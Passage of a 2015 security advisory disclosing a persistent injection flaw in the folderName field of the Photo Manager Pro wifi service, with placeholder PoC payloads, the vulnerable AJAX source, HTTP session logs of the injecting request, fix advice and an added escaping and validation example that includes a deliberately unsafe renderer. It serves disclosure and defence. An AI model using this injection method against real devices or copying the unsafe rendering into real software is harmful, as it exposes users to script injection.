<div id="content"><ul id="folders_ul"><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=1"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=1">Family</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=2"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=2">Friends</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=3"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=3">Travel</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=4"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=4">Shopping</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=5"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></div></iframe></a></div></li></ul></div>
    </div>

... after surfing to the created folder 

<div id="wrapper">
	    <div id="header">
	        <div id="title">
	            <h1>Photo Manager Pro</h1>
	        </div>
	    </div>
	    <div id="main">
	        <div id="breadcrumb"><span id="breadcrumb_span"><a href="index.html">Home</a><label> > <a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></label></x></a></label></span></div>
			<form id="download_form" action="download.action" method="post">
	        <div id="content"><ul></ul></div>
			</form>
	    </div>


PoC: Vulnerable Source
      }
      
      function createFolder() {
        $.ajax({
             type: 'POST',
             url: 'newfolder.action',
             cache: false,
             dataType: 'json',
               data: {folderName:$('#foldername').attr('value'), isSubfolder:$('#is_subfolder_hidden').attr('value'), parentFolderID:$('#parent_folder_hidden').attr('value')},
             async: false,
             success: function(result) {
                window.location.reload(false);
            }
        });
      }
  </script>


--- Poc Session Logs [POST] (Inject) ---
Status: 200[OK]
POST http://localhost:8080/newfolder.action 
Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[http://localhost:8080/index.html]
      Content-Length[50]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      folderName[*/-CODE EXECUTION VULNERABILITY!;]
      isSubfolder[0]
      parentFolderID[0]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[23]
      Date[Do., 05 März 2015 20:34:46 GMT]

Status: 200[OK]
GET http://localhost:8080/index.html 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[9421] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8080/browse_folder.html?folderID=6]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[9421]
      Date[Do., 05 März 2015 20:34:46 GMT]

Status: 200[OK]
GET http://localhost:8080/javascript/linkus.js 
Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[397] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8080/index.html]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[397]
      Date[Do., 05 März 2015 20:34:46 GMT]



Reference(s):
http://localhost:8080/index.html
http://localhost:8080/newfolder.action
http://localhost:8080/index.html#?w=300
http://localhost:8080/browse_folder.html?folderID=5


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable folderName value. Restrict the input and filter the context by use of 
your own exception handling to prevent the application-side code execution.
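As an added hardening example (not Linkus code), the following JavaScript shows how a `newfolder.action` handler and the folder-list template could treat `folderName` as untrusted data: validation bounds what gets stored, and HTML encoding at output makes a name like the advisory's PoC display as literal text instead of markup. The request shape mirrors the `createFolder()` call quoted above; the length limit, the sample folder name and the function names are assumptions.

```javascript
// Added example, not part of the Linkus Photo Manager Pro code base.
// FOLDER_NAME_MAX is an assumed limit; the advisory does not specify one.
const FOLDER_NAME_MAX = 64;

// Encode the characters that let a string change HTML structure or break out
// of a quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Server-side check for the POST body that createFolder() sends to
// newfolder.action (folderName, isSubfolder, parentFolderID).
// Returns {ok: true, value} or {ok: false, error}. Control characters and
// over-long names are rejected; other input is accepted, because output
// encoding, not input filtering, is what keeps it from becoming markup.
function validateNewFolderRequest(body) {
  const name = typeof body.folderName === 'string' ? body.folderName.trim() : '';
  if (name === '') return { ok: false, error: 'folderName is required' };
  if (name.length > FOLDER_NAME_MAX) return { ok: false, error: 'folderName too long' };
  if (/[\u0000-\u001f\u007f]/.test(name)) {
    return { ok: false, error: 'folderName contains control characters' };
  }
  if (!/^\d+$/.test(String(body.parentFolderID))) {
    return { ok: false, error: 'parentFolderID must be a non-negative integer' };
  }
  return {
    ok: true,
    value: {
      folderName: name,
      isSubfolder: String(body.isSubfolder) === '1',
      parentFolderID: Number(body.parentFolderID),
    },
  };
}

// The folder_label entry as the advisory shows it rendered: the stored name is
// concatenated straight into the page, so the browser parses it as HTML.
function renderFolderLabelUnsafe(folderID, name) {
  return '<div class="folder_label"><a href="browse_folder.html?folderID=' +
    folderID + '">' + name + '</a></div>';
}

// Hardened rendering of the same element: folderID must be a plain integer and
// the name is HTML-encoded, so the same stored value is shown as text.
function renderFolderLabel(folderID, name) {
  if (!/^\d+$/.test(String(folderID))) throw new RangeError('bad folderID');
  return '<div class="folder_label"><a href="browse_folder.html?folderID=' +
    Number(folderID) + '">' + escapeHtml(name) + '</a></div>';
}

// Constructed sample request, modelled on the PoC folder name in the advisory,
// with a tag added so the difference between the two renderings is visible.
const SAMPLE_BODY = {
  folderName: 'Funny;<b>[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]</b>',
  isSubfolder: '0',
  parentFolderID: '0',
};

// Runs the sample through validation and both renderings; returns the results
// so they can be inspected rather than only printed.
function demo(body = SAMPLE_BODY, folderID = 5) {
  const check = validateNewFolderRequest(body);
  if (!check.ok) return { accepted: false, error: check.error };
  return {
    accepted: true,
    unsafe: renderFolderLabelUnsafe(folderID, check.value.folderName),
    safe: renderFolderLabel(folderID, check.value.folderName),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```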


Security Risk:
==============
The security risk of the code execution vulnerability in the photo manager wifi service is estimated as high. (CVSS 8.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt